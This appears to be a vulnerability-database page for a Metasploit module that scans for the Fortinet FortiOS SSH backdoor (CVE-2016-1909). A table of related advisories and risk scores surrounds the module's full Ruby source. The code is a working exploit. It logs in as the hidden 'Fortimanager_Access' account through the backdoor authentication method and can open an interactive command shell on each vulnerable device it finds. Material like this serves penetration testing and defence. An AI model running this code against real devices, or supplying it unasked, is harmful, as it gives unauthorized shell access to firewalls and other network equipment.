Fortinet SSH Backdoor Scanner

🗓️ 01 Sep 2024 00:00:00Reported by wvu, operator8203, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 240 Views

Module scans for Fortinet SSH backdoor

Reporter	Title	Published	Views	Family All 20
BDU FSTEC	The vulnerability of the FortiOS operating system, the FortiAnalyzer network interface controller, and the micro-programming software of the FortiSwitch devices allow a perpetrator to gain access to protected information.	28 Jan 201600:00	–	bdu_fstec
Circl	CVE-2016-1909	29 May 201815:50	–	circl
CNVD	Fortinet FortiOS Information Disclosure Vulnerability (CNVD-2016-00441)	21 Jan 201600:00	–	cnvd
Check Point Advisories	Fortinet FortiOS SSH backdoor (CVE-2016-1909) - Ver2	5 Jul 201800:00	–	checkpoint_advisories
CVE	CVE-2016-1909	15 Jan 201620:00	–	cve
Cvelist	CVE-2016-1909	15 Jan 201620:00	–	cvelist
Exploit DB	FortiGate OS Version 4.x - 5.0.7 - SSH Backdoor	12 Jan 201600:00	–	exploitdb
Fortinet	Multiple Products SSH Undocumented Login Vulnerability	12 Jan 201600:00	–	fortinet
Tenable Nessus	Fortinet FortiOS SSH Undocumented Interactive Login Vulnerability	13 Jan 201600:00	–	nessus
Metasploit	Fortinet SSH Backdoor Scanner	29 Feb 201618:06	–	metasploit

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
  
include Msf::Exploit::Remote::SSH  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::CommandShell  
include Msf::Sessions::CreateSessionOptions  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::ReportSummary  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Fortinet SSH Backdoor Scanner',  
'Description' => %q{  
This module scans for the Fortinet SSH backdoor.  
},  
'Author' => [  
'operator8203 <operator8203[at]runbox.com>', # PoC  
'wvu' # Module  
],  
'References' => [  
['CVE', '2016-1909'],  
['EDB', '39224'],  
['PACKETSTORM', '135225'],  
['URL', 'https://seclists.org/fulldisclosure/2016/Jan/26'],  
['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']  
],  
'DisclosureDate' => '2016-01-09',  
'License' => MSF_LICENSE  
))  
  
register_options([  
Opt::RPORT(22)  
])  
  
register_advanced_options([  
OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]),  
OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])  
])  
end  
  
def run_host(ip)  
factory = ssh_socket_factory  
  
ssh_opts = ssh_client_defaults.merge({  
port: rport,  
# The auth method is converted into a class name for instantiation,  
# so fortinet-backdoor here becomes FortinetBackdoor from the mixin  
auth_methods: ['fortinet-backdoor']  
})  
  
ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']  
  
begin  
ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do  
Net::SSH.start(ip, 'Fortimanager_Access', ssh_opts)  
end  
rescue Net::SSH::Exception => e  
vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")  
return  
end  
  
return unless ssh  
  
print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access")  
  
version = ssh.transport.server_version.version  
  
report_vuln(  
host: ip,  
name: self.name,  
refs: self.references,  
info: version  
)  
  
shell = Net::SSH::CommandStream.new(ssh)  
  
# XXX: Wait for CommandStream to log a channel request failure  
sleep 0.1  
  
if (e = shell.error)  
print_error("#{ip}:#{rport} - #{e.class}: #{e.message}")  
return  
end  
  
info = "#{self.name} (#{version})"  
  
ds_merge = {  
'USERNAME' => 'Fortimanager_Access'  
}  
  
if datastore['CreateSession']  
start_session(self, info, ds_merge, false, shell.lsock)  
end  
  
# XXX: Ruby segfaults if we don't remove the SSH socket  
remove_socket(ssh.transport.socket)  
end  
  
def rport  
datastore['RPORT']  
end  
  
end  
`

01 Sep 2024 00:00Current

7High risk

Vulners AI Score7

CVSS 39.8

CVSS 210

EPSS0.71268